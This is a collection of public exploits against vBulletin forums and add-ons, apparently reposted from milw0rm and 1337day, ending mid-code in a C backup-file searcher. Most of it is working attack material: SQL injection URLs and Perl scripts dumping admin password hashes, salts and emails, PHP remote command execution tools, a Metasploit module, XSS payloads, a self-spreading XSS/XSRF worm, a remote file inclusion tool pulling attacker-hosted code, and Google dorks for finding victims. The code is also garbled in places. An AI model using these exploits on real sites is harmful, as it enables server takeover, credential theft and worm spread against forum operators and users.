SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
            init.php by secret array GLOBALS[]=1 ;)))
 
# milw0rm.com [2005-02-14]
t0pP8uZz/vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability ( php)

Código:
--==+================================================================================+==--
--==+                   RPG Inferno v2.4 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--
 
 
 
AUTHOR: t0pP8uZz & xprog
SITE: http://infernotechnologies.net/
DORK: intext:"RPG Inferno is not available to guests" or intext:"Battle Ground · Clans · Store · Jobs · Auction · Spells Shop · Statistics · Member List"
 
 
DESCRIPTION: SQL Injection in ID of inferno.php a mod for vBulletin, able to retrieve admin hash/salt.
 
EXPLOIT: 
http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*
 
NOTE: You'll need to be logged into the forum to access inferno.php. Increment the
limit to get the next admin (ie: [limit 0,1] [limit 1,1] [limit 2,1] etc).
 
 
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
 
 
--==+================================================================================+==--
--==+                   RPG Inferno v2.4 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--
 
# milw0rm.com [2007-07-10]
DSecurity/EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability ( php)

Código Perl:
#!/usr/bin/env perl use LWP::UserAgentsub banner{
print 
"###################################\n";
print 
"############ DSecurity ############\n";
print 
"###################################\n";
print 
"# Email:dsecurity.vn[at]gmail.com #\n";
print 
"###################################\n";
}
if(@
ARGV<5){
    print 
"Usage: $0 address username password number_user sleeptime\n";
    print 
"Example: $0 http://localhost/vbb test test 10 10\n";
    exit();
$ua=LWP::UserAgent->new(); $ua->agent("DSecurity"); $ua->cookie_jar({}); sub login(@){
    
my $username=shift;
    
my $password=shift;
    
my $req HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    
$req->content_type('application/x-www-form-urlencoded');
    
$req->content("vb_login_username=$username&vb_login_passwor=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");
    
my $res $ua->request($req);
sub v_request{
    
#Declare
    
$print $_[0];
    
$select $_[1];
    
$from $_[2];
    
$where $_[3];
    
$limit $_[4];
    
$sleep $ARGV[4];
    if (
$from eq '') {$from 'information_schema.tables';}
    if (
$where eq '') {$where '1';}
    if (
$limit eq '') {$limit '0';}
    if (
$sleep eq '') {$sleep '10';}
   
    
# Create a request
    
my $req HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');
    
$req->content_type('application/x-www-form-urlencoded');
    
$req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");
    
# Pass request to the user agent and get a response back
    
my $res $ua->request($req);
    
#print $res->content;
    
if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
        {
$test = $3};
    
sleep($sleep);
    return 
$print.$test."\n";
}
&
banner;
print 
"\n#############################################################################################################\n";
print 
"# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n";
print 
"# Date:06-03-2011                                                                                           #\n";
print 
"# Author: DSecurity                                                                      #\n";
print 
"# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print 
"# Version: 2.3.2                                                                                            #\n";
print 
"# Tested on: vBulletin 3.8.0                                                                                #\n";
print 
"#############################################################################################################\n";
  
#login login($ARGV[1],$ARGV[2]); #Foot print print v_request('MySQL version: ','@@version');
print 
v_request('Data dir: ','@@datadir');
print 
v_request('User: ','user()');
print 
v_request('Database: ','database()');   #Get user for($i=1;$i<=$ARGV[3];$i++){
    print 
"-----------------------------------------\n";
    print 
$id v_request('ID: ','userid','user','1',$i-1);
    if(
$id =~ /(ID:)s(.*)/){
        print 
v_request('Group: ','usergroupid','user','userid='.$2);
        print 
v_request('Username: ','username','user','userid='.$2);
        print 
v_request('Password: ','password','user','userid='.$2);
        print 
v_request('Salt: ','salt','user','userid='.$2);
        print 
v_request('Email: ','email','user','userid='.$2);
    }
           
}  

D4rkB1t/vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability ( php)

Código:
====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
 
#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : d4rkb1t@live.com
 
 
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
More info: http://j0hnx3r.org/?p=818
 
--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
 
====================================================================
# 1337day.com [2011-5-21]
====================================================================
DSecurity/cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability ( php)

Código Perl:
#!/usr/bin/perl use LWP::UserAgent$ua LWP::UserAgent->new$ua->agent("MyApp/0.1 ");
print 
"##################################\n";
print 
"############ EXPLOIT #############\n";
print 
"##################################\n";
print 
"## Portal: cchatbox             ##\n";
print 
"## Bug: SQLI                    ##\n";
print 
"## Author: DSecurity            ##\n";
print 
"## Coder: vv0lll                ##\n";
print 
"##################################\n";
   
print 
"Use: exploit.pl address number_user sleeptime\n";
print 
"Example: exploit.pl http://localhost/vbb 10 10\n";
if(@
ARGV 2) {exit;}
print 
"\n\n================================================\n"#Foot print print v_request('MySQL version: ','@@version');
print 
v_request('Data dir: ','@@datadir');
print 
v_request('User: ','user()');
print 
v_request('Database: ','database()');
      
#Get user for($i=1;$i<=$ARGV[1];$i++){
    print 
"-----------------------------------------\n";
    print 
$id v_request('ID: ','userid','user','1',$i-1);
    if(
$id =~ /(ID:)s(.*)/){
        print 
v_request('Group: ','usergroupid','user','userid='.$2);
        print 
v_request('Username: ','username','user','userid='.$2);
        print 
v_request('Password: ','password','user','userid='.$2);
        print 
v_request('Salt: ','salt','user','userid='.$2);
        print 
v_request('Email: ','email','user','userid='.$2);
    }
           
        }

print 
$ARVG[0]; sub v_request{
    
#Declare
    
$print $_[0];
    
$select $_[1];
    
$from $_[2];
    
$where $_[3];
    
$limit $_[4];
    
$sleep $ARGV[2];
    if (
$from eq '') {$from 'information_schema.tables';}
    if (
$where eq '') {$where '1';}
    if (
$limit eq '') {$limit '0';}
    if (
$sleep eq '') {$sleep '10';}
   
    
# Create a request
    
my $req HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
    
$req->content_type('application/x-www-form-urlencoded');
    
$req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');

    
# Pass request to the user agent and get a response back
    
my $res $ua->request($req);
    
#print $res->content;
    
if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
    {
$test = $3};
    
sleep($sleep);
    return 
$print.$test."\n";
}  
H-SK33PY/vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability ( php)

Código:
010101010101010101010101010101010101010101010101010101010    
   0                                                       0
   1  Iranian Datacoders Security Team 2010
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded
 
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability                   
# Date: 24/07/2010                             
# Author: H-SK33PY                      
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A
 
#BUG:#########################################################################
 
Is perhaps one or the other known, but I find that really interesting that a great and mighty forum software like vBulletin can undermine the mistake that the MySQL password for any person to be visible.
 
The issue has been published this afternoon and vBulletin responded with a patch on it.
 
The faq.php was only indirectly affected, and serves more as an "issue" because an error was partly responsible for the phrases.
 
Where are the gaps?
 
Let's look at the /install/vbulletin-language.xml file and search for "database_ingo" - what we find? Ah interesting:
 
##################################################################################################
<phrase name="database_ingo" date="1271086009" username="Jelsoft" version="3.8.5"><![CDATA[Database Name: {$vbulletin->config['Database']['dbname']}<br />
Database Host: {$vbulletin->config['MasterServer']['servername']}<br />
Database Port: {$vbulletin->config['MasterServer']['port']}<br />
Database Username: {$vbulletin->config['MasterServer']['username']}<br />
Database Password: {$vbulletin->config['MasterServer']['password']}]]></phrase>
##################################################################################################
 
How do I use this from now?
We look for a forum, which is affected by this vulnerability, click above on "Help" / "FAQ", enter in "search terms" or "Search Word (s):" then "Database"
(or database) and a then see, aha, first hit:
 
##################################################################################################
 
Datenbank-Name: XXXXXXXXX
 
Datenbank-Server: localhost
 
Datenbank-Port: 3306
 
Datenbank-Benutzername: root
 
Datenbank-Kennwort: my4moo
##################################################################################################
 
 
Respectively English beeen at a board:
 
##################################################################################################
Database Name: pro_aXXXXXXXXXg_com
 
Database Host: localhost
 
Database Port: 3306
 
Database Username: pro_aXXXXXXXXXg
 
Database Password: gitl0st
##################################################################################################
 
On what to do with it, I think I need not dwell on it.
 
How do I protect myself?
As already posted a patch from the official vBulletin site, or by a MySQL query:
 
##################################################################################################
DELETE FROM `vb_phrase` WHERE `varname`='database_ingo' 
 
 
##################################################################################################
##################################################################################################
##################################################################################################
 
#############################################################################
Our Website : http://www.datacoders.ir
 
Special Thanks to : ccC0d3rZzz &  all iranian datacoders members
 
#############################################################################
MaXe/vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization ( php)

Código:
# Exploit Title: vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile
Customization
# Google Dork: "Powered by vBulletin Version 4.0.8" -"vBulletin.com is
now powered by"
# Date: 20th November 2010
# Author: MaXe
# Software Link: Commercial software.
# Version: 4.0.8 PL1
# Screenshot: See attachment.
# Tested on: Windows and Linux (Server) + IE6 (Client).
 
 
vBulletin - XSS Filter Bypass within Profile Customization
 
 
Versions Affected: 4.0.8 PL1 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more - vBulletin has it all.
Whether it's available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online
communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability
within the
Profile Customization feature. If this feature is not enabled the
vulnerability
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour
codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
With the previous patch for vBulletin 4.0.8 PL1, most attacks were disabled
however it is possible to bypass this filter and inject data which is
then executed
effectively against though not limited to Internet Explorer 6.
 
Proof of Concept:
url(vbscript:msgbox("X/SS"))
 
 
-:: Solution ::-
Update vBulletin to version: 4.0.8 PL2
 
 
Disclosure Information:
- Vulnerability found and researched: 18th November 2010
- Disclosed to vendor (Internet Brands): 18th November
- Patch from Vendor available: 19th November
- Disclosed at: InterN0T, Full Disclosure, Bugtraq and Exploit: 20th
November
 
 
References:
http://forum.intern0t.net/intern0t-advisories/3398-vbulletin-4-0-8-pl1-cross-site-scripting-filter-bypass-within-profile-customization.html
http://forum.intern0t.net/intern0t-advisories/3349-vbulletin-4-0-8-persistent-cross-site-scripting-via-profile-customization.html
AL3NDALEEB/vBulletin <= 3.0.4 "forumdisplay.php" Code Execution ( php)

Código PHP:
<?php /**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
#
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
#
**************************************************************/
  
if (!(function_exists('curl_init'))) {
echo 
"cURL extension required\n";
exit;
}

if (
$argv[3]){ $url $argv[1]; $forumid intval($argv[2]); $command $argv[3];
}
else {
echo 
"vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo 
"Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo 
"<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo 
"<forumid> forum id\n";
echo 
"<command> command to execute on server (ex: 'ls -la')\n";
echo 
"[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo 
"ex :\n";
echo 
"\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

if (
$argv[4]) $proxy $argv[4];


  
$action 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';
  
$ch=curl_init();
if (
$proxy){ curl_setopt($chCURLOPT_PROXY,$proxy);
curl_setopt($chCURLOPT_URL,$url.'/'.$action); curl_setopt($chCURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $res substr($resstrpos($res'_START_')+7); $res substr($res,0strpos($res'_END_'));
echo 
$res;

  
?> 
// milw0rm.com [2005-02-15]
d3v1l/vBulletin Radio and TV Player Add-On HTML Injection Vulnerability ( php)

Código:
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability 
 
About:- 
 
Radio and TV Add-on will add a radio and TV library to your forum.
 
Features:- 
 
- Users can add / delete / edit own stations
 
For more info about this plugin See - http://www.vbulletin.org/forum/showthread.php?t=152037&page=2 
 
Note:-  
  
- To exploit this Bug need to be registred!and after you are registered you can add new radio station
  where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>  
  and URL "><script>alert(String.fromCharCode(88,83,83))</script>
  
 
Poc: XSS 
 
http://www.musicadigitale.net/forum/radioandtv.php?station=92 
  
Poc: Iframe 
  
http://www.musicadigitale.net/forum/radioandtv.php?station=93 
  
Poc: Redirect 
  
http://www.musicadigitale.net/forum/radioandtv.php?station=94
 
dorks:- inurl:radioandtv.php 
 
Bug founded by d3v1l [Avram Marius] 
  
Date: 14.06.2009 
 
# milw0rm.com [2009-06-15]
str0ke/vBulletin <= 3.0.6 (Template) Command Execution Exploit (metasploit) ( php)

Código:
##
#        Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#    Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#         Info: trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
#     http://metasploit.com/projects/Framework for more information.
##
 
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
 
my $advanced = { };
 
my $info = {
        'Name'     => 'vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit',
        'Version'  => '$Revision: 1.0 $',
        'Authors'  => [ 'str0ke' ],
        'Arch'     => [ ],
        'OS'       => [ ],
        'Priv'     => 0,
        'UserOpts' =>
          {
                'RHOST' => [1, 'ADDR', 'The target address'],
                'RPORT' => [1, 'PORT', 'The target port', 80],
                'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
                'RPATH' => [1, 'DATA', 'Path to the misc.php script', '/forum/misc.php'],
                'SSL'   => [0, 'BOOL', 'Use SSL'],
          },
 
        'Description' => Pex::Text::Freeform(qq{
                This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
 
        'Refs' =>
          [
                ['MIL', '832'],
          ],
 
        'Payload' =>
          {
                'Space' => 512,
                'Keys'  => ['cmd', 'cmd_bash'],
          },
 
        'Keys' => ['vBulletin'],
  };
 
sub new {
        my $class = shift;
        my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
        return($self);
}
 
sub Exploit {
        my $self = shift;
        my $target_host    = $self->GetVar('RHOST');
        my $target_port    = $self->GetVar('RPORT');
        my $vhost          = $self->GetVar('VHOST') || $target_host;
        my $path           = $self->GetVar('RPATH');
        my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;
 
        # Encode the command as a set of chr() function calls
        my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
 
        # Create the get request data
        my $data = "?do=page&template={\${passthru($byte)}}";
 
        my $req =
                "GET $path$data HTTP/1.1\r\n".
                "Host: $vhost:$target_port\r\n".
                "Content-Type: application/html\r\n".
                "Content-Length: ". length($data)."\r\n".
                "Connection: Close\r\n".
                "\r\n";
 
        my $s = Msf::Socket::Tcp->new(
                'PeerAddr'  => $target_host,
                'PeerPort'  => $target_port,
                'LocalPort' => $self->GetVar('CPORT'),
                'SSL'       => $self->GetVar('SSL'),
          );
 
        if ($s->IsError){
                $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
                return;
        }
 
        $self->PrintLine("[*] Sending the malicious vBulletin Get request...");
 
        $s->Send($req);
 
        my $results = $s->Recv(-1, 20);
        $s->Close();
 
        return;
}
 
1;
 
# milw0rm.com [2005-08-03]
Cnaph/Secure Downloads v2.0.0r for vBulletin SQL Injection Vulnerability ( php)

Código:
[~] vBulletin (Mode Secure Downloads v2.0.0r) SQL Injection Vulnerability
 
[~] Mod : http://www.1src.com/freeware/download.php?id=1880
 
[~] Author : Cn4phux
 
[~] PoC :
 
  
 
[~] URL.com/fileinfo.php?id=[SQL]
 
 
[~] : 1797'+AND(0)+UNION+SELECT+1,1,1,1,1,'Cn4phux',0,0,0,1,0,1,0,0,0,0,0,USER(),DATABASE(),0,0,0,0,0,0,0+OR+'1'='0
 
 
//Cn4phux.
 
# milw0rm.com [2008-12-08]
Hussin X/vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability ( php)

Código:
vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________
 
Author: Hussin X
 
Home :  www.IQ-TY.com<http://www.IQ-TY.com>
 
Mail : darkangel_G85@yahoo.com<mailto:darkangel_G85@yahoo.com>
___________________________________
 
## script name : ads_saed
 
## d0rk : inurl:"vb/bnnr.php"
 
## Example :
 
 
Go to url : http://server/vb/bnnr.php<http://target.com/vb/bnnr.php>
 
Exploit in the input "user name" blind injection
 
user name = ' ORDER BY 15/*
 
user name = ' ORDER BY 16/*
 
Now go to Source page  :  " Unknown column '16' in 'order clause'"
 
 
exploit :
 
user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*
 
 
 
# Solution : See here
 
http://www.traidnt.net/vb/showthread.php?t=1102593
 
or update new Product
 
 
 
End
 
IQ-SecuritY FoRuM
Mx/vBulletin 3.7.3 Visitor Message XSS/XSRF + worm Exploit ( php)

Código PHP:
/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF

 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.

 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */
  
function getNewHttpObject() {
var 
objType false;
try { 
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(
e) {
try { 
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(
e) { objType = new XMLHttpRequest();
}
}
return 
objType;
}

function 
getAXAH(url){

var 
theHttpRequest getNewHttpObject(); theHttpRequest.onreadystatechange = function() {processAXAH();}; theHttpRequest.open("GET"url); theHttpRequest.send(false);

function 
processAXAH(){
if (
theHttpRequest.readyState == 4) {
if (
theHttpRequest.status == 200) {

var 
str theHttpRequest.responseText;
var 
secloc str.indexOf('var SECURITYTOKEN = "');
var 
sectok str.substring(21+secloc,secloc+51+21);

var 
posloc str.indexOf('posthash" value="');
var 
postok str.substring(17+posloc,posloc+32+17);

var 
subject 'subject text';
var 
message 'message text';
  
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5''subject=' subject '&message=' message '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' sectok '&f=5&do=postthread&posthash=' postok 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');

}
}
}
}








function 
postAXAH(urlparams) {
var 
theHttpRequest getNewHttpObject();
                 
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);}; theHttpRequest.open("POST"url); theHttpRequest.setRequestHeader('Content-Type''application/x-www-form-urlencoded; charset=iso-8859-2'); theHttpRequest.send(params);

function 
processAXAHr(elementContainer){
if (
theHttpRequest.readyState == 4) {
if (
theHttpRequest.status == 200) {

}
}
}
}

  
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5'); document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');
  
# milw0rm.com [2008-11-20]  

ReZEN/vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

Código PHP:
<?php /*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?

*/
  
$cmd $_POST["cmd"]; $turl $_POST["turl"]; $hurl $_POST["hurl"];
  
$form"<form method=\"post\" action=\"".$PHP_SELF."\">"
     
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\"
value=\""
.$turl."\"><br>"
     
."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\"
value=\""
.$hurl."\"><br>"
     
."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\"
value=\""
.$cmd."\"><br>"
     
."<input type=\"submit\" value=\"Submit\" name=\"submit\">"

     
."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset(
$_POST['submit']))
{

echo 
$form;

}else{
  
$file fopen ("test.txt""w+");
  
fwrite($file"<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>"
); fclose($file);
  
$file fopen ($turl.$hurl"r");
if (!
$file) {
     echo 
"<p>Unable to get output.\n";
     exit;
}

echo 
$form;

while (!
feof ($file)) {
     
$line .= fgets ($file1024)."<br>";
     } 
$tpos1 strpos($line"++BEGIN++"); $tpos2 strpos($line"++END++"); $tpos1 $tpos1+strlen("++BEGIN++"); $tpos2 $tpos2-$tpos1$output substr($line$tpos1$tpos2);
echo 
$output;

?> 
# milw0rm.com [2006-04-13]
str0ke/vBulletin <= 3.0.8 Accessible Database Backup Searcher (update 3) ( php)

Código:
/*
 * Needed to pentest a few vBulletin forums so I wrote this junk real quick.
 * Reference: http://securitytracker.com/alerts/2005/Aug/1014805.html
 * Good paths: /forum/ / /forum/archive/ /forum/cpadmin/
 * Update 1: Code error fixes. /str0ke (str0ke@milw0rm.com)
 * Update 2: Fixed datestring-version for international boards by hals1 (h4ls4bschn31d3r@gmx.net)
 * Update 3: French vBulletin boards added by Tyn0r (tyn0r@atxteam.net)
 * /str0ke
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

#define SERVER_PORT 80
  
char *getdate(int b){
    static 
char datestring[40];
    
time_t ttt;
        
int minustime;
    
minustime=86400 b;
    
ttt=time(NULL)- minustime;
    
strftime (datestringsizeof(datestring), "%m-%d-%Y"localtime(&ttt));
    
printf("Searching: forumbackup-%s.sql\n"datestring);
    return(
datestring);
}
  
char *getdate2(int b){
        static 
char datestring[40];
        
time_t ttt;
        
int minustime;
        
minustime=86400 b;
        
ttt=time(NULL)- minustime;
        
strftime (datestringsizeof(datestring), "%Y-%d-%m"localtime(&ttt));
        
printf("Searching: forumbackup-%s.sql\n"datestring);
        return(
datestring);
}
  
char *getdate3(int b){
        static 
char datestring[40];
        
time_t ttt;
        
int minustime;
        
minustime=86400 b;
        
ttt=time(NULL)- minustime;
        
strftime (datestringsizeof(datestring), "%d-%m-%Y"localtime(&ttt));
        
printf("Searching: forumbackup-%s.sql\n"datestring);
        return(
datestring);
}
  
char *getdate4(int b){
    static 
char datestring[40];
    
time_t ttt;
        
int minustime;
    
minustime=86400 b;
    
ttt=time(NULL)- minustime;
    
strftime (datestringsizeof(datestring), "%m.%d.%Y"localtime(&ttt)); // hals1
    
printf("Searching: forumbackup-%s.sql\n"datestring);
    return(
datestring);
}
  
char *getdate5(int b){
        static 
char datestring[40];
        
time_t ttt;
        
int minustime;
        
minustime=86400 b;
        
ttt=time(NULL)- minustime;
        
strftime (datestringsizeof(datestring), "%Y.%d.%m"localtime(&ttt)); // hals1
        
printf("Searching: forumbackup-%s.sql\n"datestring);
        return(
datestring);
}
  
char *getdate6(int b){
        static 
char datestring[40];
        
time_t ttt;
        
int minustime;
        
minustime=86400 b;
        
ttt=time(NULL)- minustime;
        
strftime (datestringsizeof(datestring), "%d.%m.%Y"localtime(&ttt)); // hals1
        
printf("Searching: forumbackup-%s.sql\n"datestring);
        return(
datestring);
}
  
char *getdate7(int b){
        static 
char datestring[40];
        
time_t ttt;
        
int minustime;
        
minustime=86400 b;
        
ttt=time(NULL)- minustime;
        
strftime (datestringsizeof(datestring), "%d%m%Y"localtime(&ttt)); // Tyn0r
        
printf("Searching: forumbackup-%s.sql\n"datestring);
        return(
datestring);
}
  
main(int argcchar *argv[]) {

 
char buffer[1000],host[255],path[255],dog[255],c;
 
int sdrci=0d=0b;
 
struct sockaddr_in localAddrservAddr;
 
struct hostent *h;
  
char *http =
         
"Accept: */*\r\n"
         "Accept-Language: en-us,en;q=0.5\r\n"
         "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
         "User-Agent: we want your backups - milw0rm\r\n"
         "Connection: close\r\n\r\n"
;

if ( 
argc != 5) {
            
printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.com\n");
            
printf("usage: %s -h hostname/ip -p /path/ \n",argv[0]);
            exit(
0);
}


 while ((
getopt (argcargv"h:p:")) != EOF)
       switch(
c)
       {
               case 
'h':
                       
strncpy(host,optarg,sizeof(host));
                       break;
               case 
'p':
                       
strncpy(path,optarg,sizeof(path));
                       break;
       }

 
gethostbyname(host);

 if(
h==NULL) {
   
printf("Unknown Host '%s'\n",host);
   exit(
1);
 }

 
printf("Trying To Connect To [%s]\n",host);
 while(
1){
 
servAddr.sin_family h->h_addrtype;
 
memcpy((char *) &servAddr.sin_addr.s_addrh->h_addr_list[0], h->h_length);
 
servAddr.sin_port htons(SERVER_PORT);
 
sd socket(AF_INETSOCK_STREAM0);

 if(
sd<0) {
   
perror("Can Not Open The Socket\n");
   exit(
1);
 }

 
localAddr.sin_family AF_INET;
 
localAddr.sin_addr.s_addr htonl(INADDR_ANY);
 
localAddr.sin_port htons(0);

 
rc bind(sd, (struct sockaddr *) &localAddrsizeof(localAddr));

 if(
rc<0) {
   
printf("%d: cannot bind port TCP %u\n",sd,SERVER_PORT);
   
perror("error ");
   exit(
1);
 }

 
rc connect(sd, (struct sockaddr *) &servAddrsizeof(servAddr));

 if(
rc<0) {
   
perror("cannot connect\n");
   exit(
1);
 }
   
memset(buffer,0,sizeof(buffer));

   if ( 
== ) {
   
snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1\r\nHost: %s\r\n%s",path,getdate(i),host,http);
   } else if ( 
== ) {
   
